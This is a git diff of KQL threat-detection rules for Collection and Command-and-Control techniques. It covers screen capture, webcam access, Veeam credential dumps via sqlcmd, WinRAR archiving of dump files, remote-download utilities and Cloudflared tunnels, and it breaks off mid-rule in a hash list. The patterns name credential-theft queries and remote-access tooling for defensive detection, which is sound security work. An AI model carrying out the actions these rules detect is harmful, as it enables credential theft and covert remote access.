 | where ((FolderPath endswith "\\tree.com" or FolderPath endswith "\\WMIC.exe" or FolderPath endswith "\\doskey.exe" or FolderPath endswith "\\sc.exe") or (ProcessVersionInfoOriginalFileName in~ ("wmic.exe", "DOSKEY.EXE", "sc.exe"))) and (InitiatingProcessCommandLine contains " > %TEMP%\\" or InitiatingProcessCommandLine contains " > %TMP%\\")
\ No newline at end of file
diff --git a/KQL/rules/Collection/screen_capture_activity_via_psr_exe.kql b/KQL/rules/Collection/screen_capture_activity_via_psr_exe.kql
index 1ddc1555..7c7ed0ca 100644
--- a/KQL/rules/Collection/screen_capture_activity_via_psr_exe.kql
+++ b/KQL/rules/Collection/screen_capture_activity_via_psr_exe.kql
@@ -1,10 +1,10 @@
-// Title: Screen Capture Activity Via Psr.EXE
-// Author: Beyu Denis, oscd.community
-// Date: 2019-10-12
-// Level: medium
-// Description: Detects execution of Windows Problem Steps Recorder (psr.exe), a utility used to record the user screen and clicks.
-// MITRE Tactic: Collection
-// Tags: attack.collection, attack.t1113
-
-DeviceProcessEvents
+// Title: Screen Capture Activity Via Psr.EXE
+// Author: Beyu Denis, oscd.community
+// Date: 2019-10-12
+// Level: medium
+// Description: Detects execution of Windows Problem Steps Recorder (psr.exe), a utility used to record the user screen and clicks.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1113
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "/start" or ProcessCommandLine contains "-start") and FolderPath endswith "\\Psr.exe"
\ No newline at end of file
diff --git a/KQL/rules/Collection/screen_capture_macos.kql b/KQL/rules/Collection/screen_capture_macos.kql
index e12abbe0..42dc015a 100644
--- a/KQL/rules/Collection/screen_capture_macos.kql
+++ b/KQL/rules/Collection/screen_capture_macos.kql
@@ -1,12 +1,12 @@
-// Title: Screen Capture - macOS
-// Author: remotephone, oscd.community
-// Date: 2020-10-13
-// Level: low
-// Description: Detects attempts to use screencapture to collect macOS screenshots
-// MITRE Tactic: Collection
-// Tags: attack.collection, attack.t1113
-// False Positives:
-// - Legitimate user activity taking screenshots
-
-DeviceProcessEvents
+// Title: Screen Capture - macOS
+// Author: remotephone, oscd.community
+// Date: 2020-10-13
+// Level: low
+// Description: Detects attempts to use screencapture to collect macOS screenshots
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1113
+// False Positives:
+// - Legitimate user activity taking screenshots
+
+DeviceProcessEvents
 | where FolderPath =~ "/usr/sbin/screencapture"
\ No newline at end of file
diff --git a/KQL/rules/Collection/suspicious_camera_and_microphone_access.kql b/KQL/rules/Collection/suspicious_camera_and_microphone_access.kql
index df63d384..4cce5079 100644
--- a/KQL/rules/Collection/suspicious_camera_and_microphone_access.kql
+++ b/KQL/rules/Collection/suspicious_camera_and_microphone_access.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious Camera and Microphone Access
-// Author: Den Iuzvyk
-// Date: 2020-06-07
-// Level: high
-// Description: Detects Processes accessing the camera and microphone from suspicious folder
-// MITRE Tactic: Collection
-// Tags: attack.collection, attack.t1125, attack.t1123
-// False Positives:
-// - Unlikely, there could be conferencing software running from a Temp folder accessing the devices
-
-DeviceRegistryEvents
+// Title: Suspicious Camera and Microphone Access
+// Author: Den Iuzvyk
+// Date: 2020-06-07
+// Level: high
+// Description: Detects Processes accessing the camera and microphone from suspicious folder
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1125, attack.t1123
+// False Positives:
+// - Unlikely, there could be conferencing software running from a Temp folder accessing the devices
+
+DeviceRegistryEvents
 | where (RegistryKey endswith "\\Software\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\ConsentStore*" and RegistryKey contains "\\NonPackaged") and (RegistryKey contains "microphone" or RegistryKey contains "webcam") and (RegistryKey contains ":#Windows#Temp#" or RegistryKey contains ":#$Recycle.bin#" or RegistryKey contains ":#Temp#" or RegistryKey contains ":#Users#Public#" or RegistryKey contains ":#Users#Default#" or RegistryKey contains ":#Users#Desktop#")
\ No newline at end of file
diff --git a/KQL/rules/Collection/suspicious_manipulation_of_default_accounts_via_net_exe.kql b/KQL/rules/Collection/suspicious_manipulation_of_default_accounts_via_net_exe.kql
index 800c1fea..000c2506 100644
--- a/KQL/rules/Collection/suspicious_manipulation_of_default_accounts_via_net_exe.kql
+++ b/KQL/rules/Collection/suspicious_manipulation_of_default_accounts_via_net_exe.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious Manipulation Of Default Accounts Via Net.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-09-01
-// Level: high
-// Description: Detects suspicious manipulations of default accounts such as 'administrator' and 'guest'. For example 'enable' or 'disable' accounts or change the password...etc
-// MITRE Tactic: Collection
-// Tags: attack.collection, attack.t1560.001
-// False Positives:
-// - Some false positives could occur with the admin or guest account. It depends on the scripts being used by the admins in your env. If you experience a lot of FP you could reduce the level to medium
-
-DeviceProcessEvents
+// Title: Suspicious Manipulation Of Default Accounts Via Net.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-01
+// Level: high
+// Description: Detects suspicious manipulations of default accounts such as 'administrator' and 'guest'. For example 'enable' or 'disable' accounts or change the password...etc
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1560.001
+// False Positives:
+// - Some false positives could occur with the admin or guest account. It depends on the scripts being used by the admins in your env.
If you experience a lot of FP you could reduce the level to medium
+
+DeviceProcessEvents
 | where (((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe"))) and ProcessCommandLine contains " user " and (ProcessCommandLine contains " Järjestelmänvalvoja " or ProcessCommandLine contains " Rendszergazda " or ProcessCommandLine contains " Администратор " or ProcessCommandLine contains " Administrateur " or ProcessCommandLine contains " Administrador " or ProcessCommandLine contains " Administratör " or ProcessCommandLine contains " Administrator " or ProcessCommandLine contains " guest " or ProcessCommandLine contains " DefaultAccount " or ProcessCommandLine contains " \"Järjestelmänvalvoja\" " or ProcessCommandLine contains " \"Rendszergazda\" " or ProcessCommandLine contains " \"Администратор\" " or ProcessCommandLine contains " \"Administrateur\" " or ProcessCommandLine contains " \"Administrador\" " or ProcessCommandLine contains " \"Administratör\" " or ProcessCommandLine contains " \"Administrator\" " or ProcessCommandLine contains " \"guest\" " or ProcessCommandLine contains " \"DefaultAccount\" " or ProcessCommandLine contains " 'Järjestelmänvalvoja' " or ProcessCommandLine contains " 'Rendszergazda' " or ProcessCommandLine contains " 'Администратор' " or ProcessCommandLine contains " 'Administrateur' " or ProcessCommandLine contains " 'Administrador' " or ProcessCommandLine contains " 'Administratör' " or ProcessCommandLine contains " 'Administrator' " or ProcessCommandLine contains " 'guest' " or ProcessCommandLine contains " 'DefaultAccount' ")) and (not((ProcessCommandLine contains "guest" and ProcessCommandLine contains "/active no")))
\ No newline at end of file
diff --git a/KQL/rules/Collection/veeam_backup_database_suspicious_query.kql b/KQL/rules/Collection/veeam_backup_database_suspicious_query.kql
index 1fde3264..2aafc9c5 100644
--- a/KQL/rules/Collection/veeam_backup_database_suspicious_query.kql
+++ b/KQL/rules/Collection/veeam_backup_database_suspicious_query.kql
@@ -1,10 +1,10 @@
-// Title: Veeam Backup Database Suspicious Query
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-05-04
-// Level: medium
-// Description: Detects potentially suspicious SQL queries using SQLCmd targeting the Veeam backup databases in order to steal information.
-// MITRE Tactic: Collection
-// Tags: attack.collection, attack.t1005
-
-DeviceProcessEvents
+// Title: Veeam Backup Database Suspicious Query
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-04
+// Level: medium
+// Description: Detects potentially suspicious SQL queries using SQLCmd targeting the Veeam backup databases in order to steal information.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1005
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "BackupRepositories" or ProcessCommandLine contains "Backups" or ProcessCommandLine contains "Credentials" or ProcessCommandLine contains "HostCreds" or ProcessCommandLine contains "SmbFileShares" or ProcessCommandLine contains "Ssh_creds" or ProcessCommandLine contains "VSphereInfo") and ((ProcessCommandLine contains "VeeamBackup" and ProcessCommandLine contains "From ") and FolderPath endswith "\\sqlcmd.exe")
\ No newline at end of file
diff --git a/KQL/rules/Collection/veeambackup_database_credentials_dump_via_sqlcmd_exe.kql b/KQL/rules/Collection/veeambackup_database_credentials_dump_via_sqlcmd_exe.kql
index 6318e563..ecb12649 100644
--- a/KQL/rules/Collection/veeambackup_database_credentials_dump_via_sqlcmd_exe.kql
+++ b/KQL/rules/Collection/veeambackup_database_credentials_dump_via_sqlcmd_exe.kql
@@ -1,10 +1,10 @@
-// Title: VeeamBackup Database Credentials Dump Via Sqlcmd.EXE
-// Author: frack113
-// Date: 2021-12-20
-// Level: high
-// Description: Detects dump of credentials in VeeamBackup dbo
-// MITRE Tactic: Collection
-// Tags: attack.collection, attack.t1005
-
-DeviceProcessEvents
+// Title: VeeamBackup Database Credentials Dump Via Sqlcmd.EXE
+// Author: frack113
+// Date: 2021-12-20
+// Level: high
+// Description: Detects dump of credentials in VeeamBackup dbo
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1005
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "SELECT" and ProcessCommandLine contains "TOP" and ProcessCommandLine contains "[VeeamBackup].[dbo].[Credentials]") and FolderPath endswith "\\sqlcmd.exe"
\ No newline at end of file
diff --git a/KQL/rules/Collection/windows_recall_feature_enabled_disableaidataanalysis_value_deleted.kql b/KQL/rules/Collection/windows_recall_feature_enabled_disableaidataanalysis_value_deleted.kql
index 03288f4b..983c3ae0 100644
--- a/KQL/rules/Collection/windows_recall_feature_enabled_disableaidataanalysis_value_deleted.kql
+++ b/KQL/rules/Collection/windows_recall_feature_enabled_disableaidataanalysis_value_deleted.kql
@@ -1,14 +1,14 @@
-// Title: Windows Recall Feature Enabled - DisableAIDataAnalysis Value Deleted
-// Author: Sajid Nawaz Khan
-// Date: 2024-06-02
-// Level: medium
-// Description: Detects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by deleting the existing "DisableAIDataAnalysis" registry value.
-// Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities.
-// This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.
-// MITRE Tactic: Collection
-// Tags: attack.collection, attack.t1113
-// False Positives:
-// - Legitimate use/activation of Windows Recall
-
-DeviceRegistryEvents
+// Title: Windows Recall Feature Enabled - DisableAIDataAnalysis Value Deleted
+// Author: Sajid Nawaz Khan
+// Date: 2024-06-02
+// Level: medium
+// Description: Detects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by deleting the existing "DisableAIDataAnalysis" registry value.
+// Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities.
+// This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1113
+// False Positives:
+// - Legitimate use/activation of Windows Recall
+
+DeviceRegistryEvents
 | where ActionType =~ "DeleteValue" and RegistryKey endswith "\\Microsoft\\Windows\\WindowsAI\\DisableAIDataAnalysis"
\ No newline at end of file
diff --git a/KQL/rules/Collection/windows_recall_feature_enabled_registry.kql b/KQL/rules/Collection/windows_recall_feature_enabled_registry.kql
index 6bbdf733..89c77c5d 100644
--- a/KQL/rules/Collection/windows_recall_feature_enabled_registry.kql
+++ b/KQL/rules/Collection/windows_recall_feature_enabled_registry.kql
@@ -1,14 +1,14 @@
-// Title: Windows Recall Feature Enabled - Registry
-// Author: Sajid Nawaz Khan
-// Date: 2024-06-02
-// Level: medium
-// Description: Detects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by setting the value of "DisableAIDataAnalysis" to "0".
-// Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities.
-// This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.
-// MITRE Tactic: Collection
-// Tags: attack.collection, attack.t1113
-// False Positives:
-// - Legitimate use/activation of Windows Recall
-
-DeviceRegistryEvents
+// Title: Windows Recall Feature Enabled - Registry
+// Author: Sajid Nawaz Khan
+// Date: 2024-06-02
+// Level: medium
+// Description: Detects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by setting the value of "DisableAIDataAnalysis" to "0".
+// Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities.
+// This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1113
+// False Positives:
+// - Legitimate use/activation of Windows Recall
+
+DeviceRegistryEvents
 | where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey endswith "\\Software\\Policies\\Microsoft\\Windows\\WindowsAI\\DisableAIDataAnalysis"
\ No newline at end of file
diff --git a/KQL/rules/Collection/windows_recall_feature_enabled_via_reg_exe.kql b/KQL/rules/Collection/windows_recall_feature_enabled_via_reg_exe.kql
index fc2d0243..72599a22 100644
--- a/KQL/rules/Collection/windows_recall_feature_enabled_via_reg_exe.kql
+++ b/KQL/rules/Collection/windows_recall_feature_enabled_via_reg_exe.kql
@@ -1,15 +1,15 @@
-// Title: Windows Recall Feature Enabled Via Reg.EXE
-// Author: Sajid Nawaz Khan
-// Date: 2024-06-02
-// Level: medium
-// Description: Detects the enabling of the Windows Recall feature via registry manipulation.
-// Windows Recall can be enabled by deleting the existing "DisableAIDataAnalysis" value, or setting it to 0.
-// Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities.
-// This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.
-// MITRE Tactic: Collection
-// Tags: attack.collection, attack.t1113
-// False Positives:
-// - Legitimate use/activation of Windows Recall
-
-DeviceProcessEvents
+// Title: Windows Recall Feature Enabled Via Reg.EXE
+// Author: Sajid Nawaz Khan
+// Date: 2024-06-02
+// Level: medium
+// Description: Detects the enabling of the Windows Recall feature via registry manipulation.
+// Windows Recall can be enabled by deleting the existing "DisableAIDataAnalysis" value, or setting it to 0.
+// Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities.
+// This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1113
+// False Positives:
+// - Legitimate use/activation of Windows Recall
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") and (ProcessCommandLine contains "Microsoft\\Windows\\WindowsAI" and ProcessCommandLine contains "DisableAIDataAnalysis") and ((ProcessCommandLine contains "add" or ProcessCommandLine contains "0") or ProcessCommandLine contains "delete")
\ No newline at end of file
diff --git a/KQL/rules/Collection/winrar_compressing_dump_files.kql b/KQL/rules/Collection/winrar_compressing_dump_files.kql
index a62b7e72..f1601036 100644
--- a/KQL/rules/Collection/winrar_compressing_dump_files.kql
+++ b/KQL/rules/Collection/winrar_compressing_dump_files.kql
@@ -1,13 +1,13 @@
-// Title: Winrar Compressing Dump Files
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-01-04
-// Level: medium
-// Description: Detects execution of WinRAR in order to compress a file with a ".dmp"/".dump" extension, which could be a step in a process of dump file exfiltration.
-// MITRE Tactic: Collection
-// Tags: attack.collection, attack.t1560.001
-// False Positives:
-// - Legitimate use of WinRAR with a command line in which ".dmp" or ".dump" appears accidentally
-// - Legitimate use of WinRAR to compress WER ".dmp" files for troubleshooting
-
-DeviceProcessEvents
+// Title: Winrar Compressing Dump Files
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-01-04
+// Level: medium
+// Description: Detects execution of WinRAR in order to compress a file with a ".dmp"/".dump" extension, which could be a step in a process of dump file exfiltration.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1560.001
+// False Positives:
+// - Legitimate use of WinRAR with a command line in which ".dmp" or ".dump" appears accidentally
+// - Legitimate use of WinRAR to compress WER ".dmp" files for troubleshooting
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains ".dmp" or ProcessCommandLine contains ".dump" or ProcessCommandLine contains ".hdmp") and ((FolderPath endswith "\\rar.exe" or FolderPath endswith "\\winrar.exe") or ProcessVersionInfoFileDescription =~ "Command line RAR")
\ No newline at end of file
diff --git a/KQL/rules/Collection/winrar_execution_in_non_standard_folder.kql b/KQL/rules/Collection/winrar_execution_in_non_standard_folder.kql
index 1f8fb505..53b9ca49 100644
--- a/KQL/rules/Collection/winrar_execution_in_non_standard_folder.kql
+++ b/KQL/rules/Collection/winrar_execution_in_non_standard_folder.kql
@@ -1,12 +1,12 @@
-// Title: WinRAR Execution in Non-Standard Folder
-// Author: Florian Roth (Nextron Systems), Tigzy
-// Date: 2021-11-17
-// Level: medium
-// Description: Detects a suspicious WinRAR execution in a folder which is not the default installation folder
-// MITRE Tactic: Collection
-// Tags: attack.collection, attack.t1560.001
-// False Positives:
-// - Legitimate use of WinRAR in a folder of a software that bundles WinRAR
-
-DeviceProcessEvents
+// Title: WinRAR Execution in Non-Standard Folder
+// Author: Florian Roth (Nextron Systems), Tigzy
+// Date: 2021-11-17
+// Level: medium
+// Description: Detects a suspicious WinRAR execution in a folder which is not the default installation folder
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1560.001
+// False Positives:
+// - Legitimate use of WinRAR in a folder of a software that bundles WinRAR
+
+DeviceProcessEvents
 | where ((FolderPath endswith "\\rar.exe" or FolderPath endswith "\\winrar.exe") or (ProcessVersionInfoFileDescription in~ ("Command line RAR", "WinRAR"))) and (not(((FolderPath contains ":\\Program Files (x86)\\WinRAR\\" or FolderPath contains ":\\Program Files\\WinRAR\\") or FolderPath endswith "\\UnRAR.exe"))) and (not(FolderPath contains ":\\Windows\\Temp\\"))
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/adsi_cache_file_creation_by_uncommon_tool.kql b/KQL/rules/Command and Control/adsi_cache_file_creation_by_uncommon_tool.kql
index cba2f4eb..e58ae69a 100644
--- a/KQL/rules/Command and Control/adsi_cache_file_creation_by_uncommon_tool.kql
+++ b/KQL/rules/Command and Control/adsi_cache_file_creation_by_uncommon_tool.kql
@@ -1,12 +1,12 @@
-// Title: ADSI-Cache File Creation By Uncommon Tool
-// Author: xknow @xknow_infosec, Tim Shelton
-// Date: 2019-03-24
-// Level: medium
-// Description: Detects the creation of an "Active Directory Schema Cache File" (.sch) file by an uncommon tool.
-// MITRE Tactic: Command and Control
-// Tags: attack.t1001.003, attack.command-and-control
-// False Positives:
-// - Other legimate tools, which do ADSI (LDAP) operations, e.g. any remoting activity by MMC, Powershell, Windows etc.
-
-DeviceFileEvents
+// Title: ADSI-Cache File Creation By Uncommon Tool
+// Author: xknow @xknow_infosec, Tim Shelton
+// Date: 2019-03-24
+// Level: medium
+// Description: Detects the creation of an "Active Directory Schema Cache File" (.sch) file by an uncommon tool.
+// MITRE Tactic: Command and Control
+// Tags: attack.t1001.003, attack.command-and-control
+// False Positives:
+// - Other legimate tools, which do ADSI (LDAP) operations, e.g. any remoting activity by MMC, Powershell, Windows etc.
+
+DeviceFileEvents
 | where (FolderPath contains "\\Local\\Microsoft\\Windows\\SchCache\\" and FolderPath endswith ".sch") and (not((((InitiatingProcessFolderPath endswith ":\\Program Files\\Cylance\\Desktop\\CylanceSvc.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\CCM\\CcmExec.exe" or InitiatingProcessFolderPath endswith ":\\windows\\system32\\dllhost.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\system32\\dsac.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\system32\\efsui.exe" or InitiatingProcessFolderPath endswith ":\\windows\\system32\\mmc.exe" or InitiatingProcessFolderPath endswith ":\\windows\\system32\\svchost.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\wbem\\WmiPrvSE.exe" or InitiatingProcessFolderPath endswith ":\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe") or (InitiatingProcessFolderPath contains ":\\Windows\\ccmsetup\\autoupgrade\\ccmsetup" or InitiatingProcessFolderPath contains ":\\Program Files\\SentinelOne\\Sentinel Agent")) or ((InitiatingProcessFolderPath contains ":\\Program Files\\" and InitiatingProcessFolderPath contains "\\Microsoft Office") and InitiatingProcessFolderPath endswith "\\OUTLOOK.EXE")))) and (not((InitiatingProcessFolderPath endswith ":\\Program Files\\Citrix\\Receiver StoreFront\\Services\\DefaultDomainServices\\Citrix.DeliveryServices.DomainServices.ServiceHost.exe" or InitiatingProcessFolderPath endswith "\\LANDesk\\LDCLient\\ldapwhoami.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/anydesk_temporary_artefact.kql b/KQL/rules/Command and Control/anydesk_temporary_artefact.kql
index 1cfde36a..45ba1b42 100644
--- a/KQL/rules/Command and Control/anydesk_temporary_artefact.kql
+++ b/KQL/rules/Command and Control/anydesk_temporary_artefact.kql
@@ -1,14 +1,14 @@
-// Title: Anydesk Temporary Artefact
-// Author: frack113
-// Date: 2022-02-11
-// Level: medium
-// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
-// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
-// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1219.002
-// False Positives:
-// - Legitimate use
-
-DeviceFileEvents
+// Title: Anydesk Temporary Artefact
+// Author: frack113
+// Date: 2022-02-11
+// Level: medium
+// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
+// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
+// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+// - Legitimate use
+
+DeviceFileEvents
 | where FolderPath contains "\\AppData\\Roaming\\AnyDesk\\user.conf" or FolderPath contains "\\AppData\\Roaming\\AnyDesk\\system.conf"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/arbitrary_file_download_via_gfxdownloadwrapper_exe.kql b/KQL/rules/Command and Control/arbitrary_file_download_via_gfxdownloadwrapper_exe.kql
index a91eace5..d724539f 100644
--- a/KQL/rules/Command and Control/arbitrary_file_download_via_gfxdownloadwrapper_exe.kql
+++ b/KQL/rules/Command and Control/arbitrary_file_download_via_gfxdownloadwrapper_exe.kql
@@ -1,10 +1,10 @@
-// Title: Arbitrary File Download Via GfxDownloadWrapper.EXE
-// Author: Victor Sergeev, oscd.community
-// Date: 2020-10-09
-// Level: medium
-// Description: Detects execution of GfxDownloadWrapper.exe with a URL as an argument to download file.
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1105
-
-DeviceProcessEvents
+// Title: Arbitrary File Download Via GfxDownloadWrapper.EXE
+// Author: Victor Sergeev, oscd.community
+// Date: 2020-10-09
+// Level: medium
+// Description: Detects execution of GfxDownloadWrapper.exe with a URL as an argument to download file.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and FolderPath endswith "\\GfxDownloadWrapper.exe") and (not(ProcessCommandLine contains "https://gameplayapi.intel.com/"))
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/cloudflared_portable_execution.kql b/KQL/rules/Command and Control/cloudflared_portable_execution.kql
index f1e0969e..d99d96f1 100644
--- a/KQL/rules/Command and Control/cloudflared_portable_execution.kql
+++ b/KQL/rules/Command and Control/cloudflared_portable_execution.kql
@@ -1,12 +1,12 @@
-// Title: Cloudflared Portable Execution
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-12-20
-// Level: medium
-// Description: Detects the execution of the "cloudflared" binary from a non standard location.
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1090.001
-// False Positives:
-// - Legitimate usage of Cloudflared portable versions
-
-DeviceProcessEvents
+// Title: Cloudflared Portable Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-12-20
+// Level: medium
+// Description: Detects the execution of the "cloudflared" binary from a non standard location.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1090.001
+// False Positives:
+// - Legitimate usage of Cloudflared portable versions
+
+DeviceProcessEvents
 | where FolderPath endswith "\\cloudflared.exe" and (not((FolderPath contains ":\\Program Files (x86)\\cloudflared\\" or FolderPath contains ":\\Program Files\\cloudflared\\")))
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/cloudflared_quick_tunnel_execution.kql b/KQL/rules/Command and Control/cloudflared_quick_tunnel_execution.kql
index b41427df..ff33f70f 100644
--- a/KQL/rules/Command and Control/cloudflared_quick_tunnel_execution.kql
+++ b/KQL/rules/Command and Control/cloudflared_quick_tunnel_execution.kql
@@ -1,14 +1,14 @@
-// Title: Cloudflared Quick Tunnel Execution
-// Author: Sajid Nawaz Khan
-// Date: 2023-12-20
-// Level: medium
-// Description: Detects creation of an ad-hoc Cloudflare Quick Tunnel, which can be used to tunnel local services such as HTTP, RDP, SSH and SMB.
-// The free TryCloudflare Quick Tunnel will generate a random subdomain on trycloudflare[.]com, following a call to api[.]trycloudflare[.]com.
-// The tool has been observed in use by threat groups including Akira ransomware.
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1090.001
-// False Positives:
-// - Legitimate usage of Cloudflare Quick Tunnel
-
-DeviceProcessEvents
+// Title: Cloudflared Quick Tunnel Execution
+// Author: Sajid Nawaz Khan
+// Date: 2023-12-20
+// Level: medium
+// Description: Detects creation of an ad-hoc Cloudflare Quick Tunnel, which can be used to tunnel local services such as HTTP, RDP, SSH and SMB.
+// The free TryCloudflare Quick Tunnel will generate a random subdomain on trycloudflare[.]com, following a call to api[.]trycloudflare[.]com.
+// The tool has been observed in use by threat groups including Akira ransomware.
+// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1090.001 +// False Positives: +// - Legitimate usage of Cloudflare Quick Tunnel + +DeviceProcessEvents | where (((FolderPath endswith "\\cloudflared.exe" or FolderPath endswith "\\cloudflared-windows-386.exe" or FolderPath endswith "\\cloudflared-windows-amd64.exe") or (SHA256 startswith "2fb6c04c4f95fb8d158af94c137f90ac820716deaf88d8ebec956254e046cb29" or SHA256 startswith "b3d21940a10fdef5e415ad70331ce257c24fe3bcf7722262302e0421791f87e8" or SHA256 startswith "1fbd8362b2d2d2e6a5750ae3db69cd1815e6c1d31da48a98b796450971a8e039" or SHA256 startswith "0409c9b12f9d0eda86e461ed9bdabeefb00172b26322079681a0bdf48e68dc28" or SHA256 startswith "7cfb411d04bac42ef93d1f0c93c0a481e38c6f4612b97ae89d4702595988edc7" or SHA256 startswith "5b3c2d846ab162dc6bc595cce3a49de5731afde5d6060be7066d21b013a28373" or SHA256 startswith "ce95df7f69664c3df19b76028e115931919a71517b776da7b42d353e2ff4a670" or SHA256 startswith "1293525a19cfe3bc8296b62fbfe19f083632ed644a1c18c10b045a1d3030d81a" or SHA256 startswith "af2b9161cfcb654b16408cd6b098afe9d1fb61a037d18d7090a119d4c0c8e0f0" or SHA256 startswith "39ddceb56a15798826a5fc4892fa2b474c444bb4d7a8bf2fa95e41cab10fa7a1" or SHA256 startswith "ccd11f2328023a0e7929e845d5b6e7bc783fb4650d65faef3ae090239d4bbce2" or SHA256 startswith "b6e5c5d2567ae8c69cc012ebcae30e6c9b5359d64a58d17ba75ec89f8bce71ac" or SHA256 startswith "f813484ea441404f18caad96f28138e8aaf0cb256163c09c2ab8a3acab87f69f" or SHA256 startswith "fc4a0802ab9c7409b892ca00636bec61e2acfc911bccfdeb9978b8ab5a2f828d" or SHA256 startswith "083150724b49604c8765c1ba19541fa260b133be0acb0647fcd936d81f054499" or SHA256 startswith "44303d6572956f28a0f2e4b188934fb9874f2584f5c81fa431a463cfbf28083b" or SHA256 startswith "5d38c46032a58e28ae5f7d174d8761ec3d64d186677f3ec53af5f51afb9bfd2f" or SHA256 startswith "e1e70fa42059911bc6685fafef957f9a73fc66f214d0704a9b932683a5204032" or SHA256 startswith 
"c01356092a365b84f84f0e66870bd1a05ba3feb53cafd973fa5fea2534bee234" or SHA256 startswith "b3f9c06151e30ee43d39e788a79cd918a314f24e04fe87f3de8272a2057b624f" or SHA256 startswith "cd81b2792f0739f473c31c9cb7cf2313154bfa28b839975802b90e8790bb5058" or SHA256 startswith "9ec7e6c8e1bfd883663d8d9d62c9e4f9ae373b731407181e32491b27a7218a2c" or SHA256 startswith "c2cfd23fdc6c0e1b1ffa0e545cbe556f18d11b362b4a89ba0713f6ab01c4827f" or SHA256 startswith "53f8adbd76c0eb16f5e43cadde422474d8a06f9c8f959389c1930042ad8beaa5" or SHA256 startswith "648c8d2f8001c113d2986dd00b7bbd181593d462bef73522cee212c4f71f95b3" or SHA256 startswith "ae047e2095e46c3f9c518b2be67ec753f4f0aad23b261a361fcb6144dcdb63b4" or SHA256 startswith "3153d2baa462978dd22ab33d1c2274ecc88c200225d6a3327f98d5b752d08f5c" or SHA256 startswith "f49cde976e628012c9db73e1c8d76081944ecf2297cdafeb78bb13290da274c4" or SHA256 startswith "d2513e58bb03ccc83affde685c6ef987924c37ce6707d8e9857e2524b0d7e90f" or SHA256 startswith "bb67c7623ba92fe64ffd9816b8d5b3b1ea3013960a30bd4cf6e295b3eb5b1bad" or SHA256 startswith 